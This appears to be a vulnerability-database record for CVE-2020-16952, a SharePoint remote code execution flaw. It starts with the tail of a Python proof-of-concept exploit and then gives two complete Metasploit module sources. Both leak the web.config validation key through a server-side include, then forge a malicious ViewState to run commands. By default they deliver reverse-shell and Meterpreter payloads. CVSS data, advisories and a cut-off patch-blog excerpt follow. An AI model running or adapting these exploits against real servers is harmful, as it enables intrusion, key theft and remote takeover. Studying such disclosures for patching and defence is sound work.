[target]\r\nContent-Length: 67```\r\n\r\nThen https://[target]/poc.aspx should return 16.0.10364.20001.\r\n\r\n## Credit:\r\n\r\nSteven Seeley (mr_me) of Qihoo 360 Vulcan Team\r\n\r\n## Example:\r\n\r\nFor testing, download ysoserial.net and store it in a folder called `yss`.\r\n\r\nresearcher@DESKTOP-H4JDQCB:~$ ./poc.py\r\n(+) usage: ./poc.py(+) eg: ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### mspaint\r\n(+) eg: ./poc.py win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad\r\n\r\nresearcher@DESKTOP-H4JDQCB:~$ ./poc.py win-3t816hj84n4 harryh@pwn.me:user123### notepad\r\n(+) leaked validation key: 55AAE0A8E646746523FA5EE0675232BE39990CDAC3AE2B0772E32D71C05929D8\r\n(+) triggering rce, running 'cmd /c notepad'\r\n(+) done! rce achieved\r\n\"\"\"\r\nimport os\r\nimport re\r\nimport sys\r\nimport urllib3\r\nimport requests\r\nimport subprocess\r\nfrom platform import uname\r\nfrom requests_ntlm2 import HttpNtlmAuth\r\nfrom urllib.parse import urlparse\r\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\r\n\r\ndef put_page(target, domain, user, password):\r\n payload = \"\"\"\"\"\"\r\n r = requests.put(\"http://%s/poc.aspx\" % target, data=payload, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password))\r\n assert (r.status_code == 200 or r.status_code == 201), \"(-) page creation failed, user doesn't have site ownership rights!\"\r\n\r\ndef get_vkey(target, domain, user, password):\r\n h = { \"360Vulcan\": \"\" }\r\n r = requests.get(\"http://%s/poc.aspx\" % target, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password), headers=h)\r\n match = re.search(\"machineKey validationKey=\\\"(.{64})\", r.text)\r\n assert match, \"(-) unable to leak the validation key, exploit failed!\"\r\n return match.group(1)\r\n\r\ndef trigger_rce(target, domain, path, user, password, cmd, key):\r\n out = subprocess.Popen([\r\n 'yss/ysoserial.exe', \r\n '-p', 'ViewState',\r\n '-g', 'TypeConfuseDelegate',\r\n '-c', '%s' % cmd,\r\n '--apppath=%s' % path,\r\n '--path=%s_layouts/15/zoombldr.aspx' % path,\r\n '--islegacy',\r\n '--validationalg=HMACSHA256',\r\n '--validationkey=%s' % key\r\n ], stdout=subprocess.PIPE)\r\n rce = { \"__VIEWSTATE\" : out.communicate()[0].decode() }\r\n requests.post(\"http://%s/_layouts/15/zoombldr.aspx\" % target, data=rce, auth=HttpNtlmAuth('%s\\\\%s' % (domain, user), password))\r\n\r\ndef main():\r\n if len(sys.argv) != 4:\r\n print(\"(+) usage: %s\" % sys.argv[0])\r\n print(\"(+) eg: %s win-3t816hj84n4 harryh@pwn.me:user123### mspaint\" % sys.argv[0])\r\n print(\"(+) eg: %s win-3t816hj84n4/sites/test harryh@pwn.me:user123### notepad\" % sys.argv[0])\r\n sys.exit(-1)\r\n target = sys.argv[1]\r\n user = sys.argv[2].split(\":\")[0].split(\"@\")[0]\r\n password = sys.argv[2].split(\":\")[1]\r\n domain = sys.argv[2].split(\":\")[0].split(\"@\")[1]\r\n cmd = sys.argv[3]\r\n path = urlparse(\"http://%s\" % target).path or \"/\"\r\n path = path + \"/\" if not path.endswith(\"/\") else path\r\n put_page(target, domain, user, password)\r\n key = get_vkey(target, domain, user, password)\r\n print(\"(+) leaked validation key: %s\" % key)\r\n print(\"(+) triggering rce, running 'cmd /c %s'\" % cmd)\r\n trigger_rce(target, domain, path, user, password, cmd, key)\r\n print(\"(+) done! rce achieved\")\r\n\r\nif __name__ == '__main__':\r\n if \"microsoft\" not in uname()[2].lower():\r\n print(\"(-) WARNING - this was tested on wsl, so it may not work on other platforms\")\r\n if not os.path.exists('yss/ysoserial.exe'):\r\n print(\"(-) missing ysoserial.net!\")\r\n sys.exit(-1)\r\n main()", "sourceHref": "https://srcincite.io/pocs/cve-2020-16952.py.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2023-06-06T16:41:00", "description": "This Metasploit module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-19T00:00:00", "type": "zdt", "title": "Microsoft SharePoint SSI / ViewState Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-19T00:00:00", "id": "1337DAY-ID-35071", "href": "https://0day.today/exploit/description/35071", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::ViewState\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',\n 'Description' => %q{\n This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16952'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']\n ],\n 'DisclosureDate' => '2020-10-13', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n ],\n [\n 'Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'CmdStagerFlavor' => %i[psh_invokewebrequest certutil vbs],\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n ],\n [\n 'PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'DotNetGadgetChain' => :TypeConfuseDelegate\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),\n # \"Promote\" these advanced options so we don't have to pass around our own\n OptString.new('HttpUsername', [false, 'SharePoint username']),\n OptString.new('HttpPassword', [false, 'SharePoint password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def vuln_builds\n [\n [Gem::Version.new('15.0.0.4571'), Gem::Version.new('15.0.0.5275')], # SharePoint 2013\n [Gem::Version.new('16.0.0.4351'), Gem::Version.new('16.0.0.5056')], # SharePoint 2016\n [Gem::Version.new('16.0.0.10337'), Gem::Version.new('16.0.0.10366')] # SharePoint 2019\n ]\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path)\n )\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n # Hat tip @tsellers-r7\n #\n # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly\n unless (build_header = res.headers['MicrosoftSharePointTeamServices'])\n return CheckCode::Unknown('Target does not appear to be running SharePoint.')\n end\n\n unless (build = build_header.scan(/^([\\d.]+):/).flatten.first)\n return CheckCode::Detected('Target did not respond with SharePoint build.')\n end\n\n if vuln_builds.any? { |build_range| Gem::Version.new(build).between?(*build_range) }\n return CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\")\n end\n\n CheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\")\n end\n\n def exploit\n unless username && password\n fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')\n end\n\n if (@validation_key = datastore['VALIDATION_KEY'])\n print_status(\"Using ViewState validation key #{@validation_key}\")\n else\n create_ssi_page\n leak_web_config\n end\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def create_ssi_page\n print_status(\"Creating page for SSI: #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'PUT',\n 'uri' => ssi_path,\n 'data' => ssi_page\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless [200, 201].include?(res.code)\n if res.code == 401\n fail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\")\n end\n\n fail_with(Failure::NotFound, 'Failed to create page')\n end\n\n print_good('Successfully created page')\n @page_created = true\n end\n\n def leak_web_config\n print_status('Leaking web.config')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => ssi_path,\n 'headers' => {\n ssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\")\n end\n\n unless (web_config = res.get_xml_document.at('//configuration'))\n fail_with(Failure::NotFound, 'Failed to extract web.config from response')\n end\n\n print_good(\"Saved web.config to: #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\")\n\n unless (@validation_key = extract_viewstate_validation_key(web_config))\n fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')\n end\n\n print_good(\"ViewState validation key: #{@validation_key}\")\n ensure\n delete_ssi_page if @page_created\n end\n\n def delete_ssi_page\n print_status(\"Deleting #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'DELETE',\n 'uri' => ssi_path,\n 'partial' => true\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 204\n print_warning('Failed to delete page')\n return\n end\n\n print_good('Successfully deleted page')\n end\n\n def execute_command(cmd, _opts = {})\n vprint_status(\"Executing command: #{cmd}\")\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),\n 'vars_post' => {\n '__VIEWSTATE' => generate_viewstate_payload(\n cmd,\n extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx\n algo: 'sha256',\n key: pack_viewstate_validation_key(@validation_key)\n )\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good('Successfully executed command')\n end\n\n def ssi_page\n <<~XML\n <WebPartPages:DataFormWebPart runat=\"server\">\n <ParameterBindings>\n <ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" />\n </ParameterBindings>\n <xsl>\n <xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n <xsl:param name=\"#{ssi_param}\" />\n <xsl:template match=\"/\">\n <xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" />\n </xsl:template>\n </xsl:stylesheet>\n </xsl>\n </WebPartPages:DataFormWebPart>\n XML\n end\n\n def ssi_path\n @ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\")\n end\n\n def ssi_header\n @ssi_header ||= rand_text_alphanumeric(8..42)\n end\n\n def ssi_param\n @ssi_param ||= rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35071", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-01T04:47:48", "description": "This module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key. This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint. The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization. Tested against SharePoint 2019 on Windows Server 2016.\n", "cvss3": {}, "published": "2020-10-14T22:45:15", "type": "metasploit", "title": "Microsoft SharePoint Server-Side Include and ViewState RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-16952"], "modified": "2021-06-14T14:15:27", "id": "MSF:EXPLOIT-WINDOWS-HTTP-SHAREPOINT_SSI_VIEWSTATE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/sharepoint_ssi_viewstate/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HTTP::Sharepoint\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft SharePoint Server-Side Include and ViewState RCE',\n 'Description' => %q{\n This module exploits a server-side include (SSI) in SharePoint to leak\n the web.config file and forge a malicious ViewState with the extracted\n validation key.\n\n This exploit is authenticated and requires a user with page creation\n privileges, which is a standard permission in SharePoint.\n\n The web.config file will be stored in loot once retrieved, and the\n VALIDATION_KEY option can be set to short-circuit the SSI and trigger\n the ViewState deserialization.\n\n Tested against SharePoint 2019 on Windows Server 2016.\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-16952'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0022/'],\n ['URL', 'https://srcincite.io/pocs/cve-2020-16952.py.txt'],\n ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952']\n ],\n 'DisclosureDate' => '2020-10-13', # Public disclosure\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Windows Command',\n {\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'\n }\n }\n ],\n [\n 'Windows Dropper',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,\n 'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'\n }\n }\n ],\n [\n 'PowerShell Stager',\n {\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'DotNetGadgetChain' => :TypeConfuseDelegate\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time\n 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),\n OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),\n # \"Promote\" these advanced options so we don't have to pass around our own\n OptString.new('HttpUsername', [false, 'SharePoint username']),\n OptString.new('HttpPassword', [false, 'SharePoint password'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def username\n datastore['HttpUsername']\n end\n\n def password\n datastore['HttpPassword']\n end\n\n def cookie\n datastore['COOKIE']\n end\n\n def vuln_builds\n # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates\n # https://buildnumbers.wordpress.com/sharepoint/\n [\n [Rex::Version.new('15.0.0.4571'), Rex::Version.new('15.0.0.5275')], # SharePoint 2013\n [Rex::Version.new('16.0.0.4351'), Rex::Version.new('16.0.0.5056')], # SharePoint 2016\n [Rex::Version.new('16.0.0.10337'), Rex::Version.new('16.0.0.10366')] # SharePoint 2019\n ]\n end\n\n def check\n build = sharepoint_get_version('cookie' => cookie)\n\n if build.nil?\n return CheckCode::Unknown('Failed to retrieve the SharePoint version number')\n end\n\n if vuln_builds.any? { |build_range| build.between?(*build_range) }\n return CheckCode::Appears(\"SharePoint #{build} is a vulnerable build.\")\n end\n\n CheckCode::Safe(\"SharePoint #{build} is not a vulnerable build.\")\n end\n\n def exploit\n if (username.blank? && password.blank?)\n if cookie.blank?\n fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword or COOKIE are required for exploitation')\n end\n\n print_warning('Using the specified COOKIE for authentication')\n end\n\n if (@validation_key = datastore['VALIDATION_KEY'])\n print_status(\"Using ViewState validation key #{@validation_key}\")\n else\n create_ssi_page\n leak_web_config\n end\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def create_ssi_page\n print_status(\"Creating page for SSI: #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'PUT',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'data' => ssi_page\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless [200, 201].include?(res.code)\n if res.code == 401\n fail_with(Failure::NoAccess, \"Failed to auth with creds #{username}:#{password}\")\n end\n\n fail_with(Failure::NotFound, 'Failed to create page')\n end\n\n print_good('Successfully created page')\n @page_created = true\n end\n\n def leak_web_config\n print_status('Leaking web.config')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'headers' => {\n ssi_header => '<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->'\n }\n )\n\n unless res\n fail_with(Failure::Unreachable, \"Target did not respond to #{__method__}\")\n end\n\n unless res.code == 200\n fail_with(Failure::NotFound, \"Failed to retrieve #{ssi_path}\")\n end\n\n unless (web_config = res.get_xml_document.at('//configuration'))\n fail_with(Failure::NotFound, 'Failed to extract web.config from response')\n end\n\n print_good(\"Saved web.config to #{store_loot('web.config', 'text/xml', rhost, web_config.to_xml, 'web.config', name)}\")\n\n unless (@validation_key = extract_viewstate_validation_key(web_config))\n fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')\n end\n\n print_good(\"ViewState validation key: #{@validation_key}\")\n ensure\n delete_ssi_page if @page_created\n end\n\n def delete_ssi_page\n print_status(\"Deleting #{ssi_path}\")\n\n res = send_request_cgi(\n 'method' => 'DELETE',\n 'uri' => ssi_path,\n 'cookie' => cookie,\n 'partial' => true\n )\n\n unless res\n print_error(\"Target did not respond to #{__method__}\")\n return\n end\n\n unless res.code == 204\n print_warning('Failed to delete page')\n return\n end\n\n print_good('Successfully deleted page')\n end\n\n def execute_command(cmd, _opts = {})\n sharepoint_execute_command_via_viewstate(cmd, @validation_key, { 'cookie' => cookie })\n end\n\n def ssi_page\n <<~XML\n <%@ Register Tagprefix=\"WebPartPages\" Namespace=\"Microsoft.SharePoint.WebPartPages\" Assembly=\"Microsoft.SharePoint, Version=14.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c\" %>\n <WebPartPages:DataFormWebPart runat=\"server\">\n <ParameterBindings>\n <ParameterBinding Name=\"#{ssi_param}\" Location=\"ServerVariable(HTTP_#{ssi_header})\" DefaultValue=\"\" />\n </ParameterBindings>\n <xsl>\n <xsl:stylesheet xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\" version=\"1.0\">\n <xsl:param name=\"#{ssi_param}\" />\n <xsl:template match=\"/\">\n <xsl:value-of select=\"$#{ssi_param}\" disable-output-escaping=\"yes\" />\n </xsl:template>\n </xsl:stylesheet>\n </xsl>\n </WebPartPages:DataFormWebPart>\n XML\n end\n\n def ssi_path\n @ssi_path ||= normalize_uri(target_uri.path, \"#{rand_text_alphanumeric(8..42)}.aspx\")\n end\n\n def ssi_header\n @ssi_header ||= rand_text_alphanumeric(8..42)\n end\n\n def ssi_param\n @ssi_param ||= rand_text_alphanumeric(8..42)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "mscve": [{"lastseen": "2023-06-14T15:27:23", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-13T07:00:00", "type": "mscve", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-13T07:00:00", "id": "MS:CVE-2020-16952", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-06-06T14:30:17", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16952.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16951", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-21T16:07:00", "cpe": ["cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_server:2019"], "id": "CVE-2020-16951", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16951", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:13", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-10-16T23:15:00", "type": "cve", "title": "CVE-2020-16952", "cwe": ["CWE-346"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16951", "CVE-2020-16952"], "modified": "2020-10-21T16:07:00", "cpe": ["cpe:/a:microsoft:sharepoint_enterprise_server:2016", "cpe:/a:microsoft:sharepoint_foundation:2013", "cpe:/a:microsoft:sharepoint_server:2019"], "id": "CVE-2020-16952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:sharepoint_enterprise_server:2016:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:sharepoint_foundation:2013:sp1:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2020-10-21T10:01:47", "description": "This month\u2019s Microsoft Patch Tuesday addresses 87 vulnerabilities with 11 of them labeled as Critical. The 11 Critical vulnerabilities cover TCP/IP Stack, SharePoint, Windows Camera Codec Pack, Graphics and several other workstation vulnerabilities. Adobe issued patches today for Adobe Flash Player.\n\n### Workstation Patches\n\nContinuing the trend, today\u2019s Patch Tuesday fixes many vulnerabilities that impact workstations. The Windows Camera Codec, GDI+, Browser, Hyper-V, Outlook, Media Foundation and Graphics components vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used for 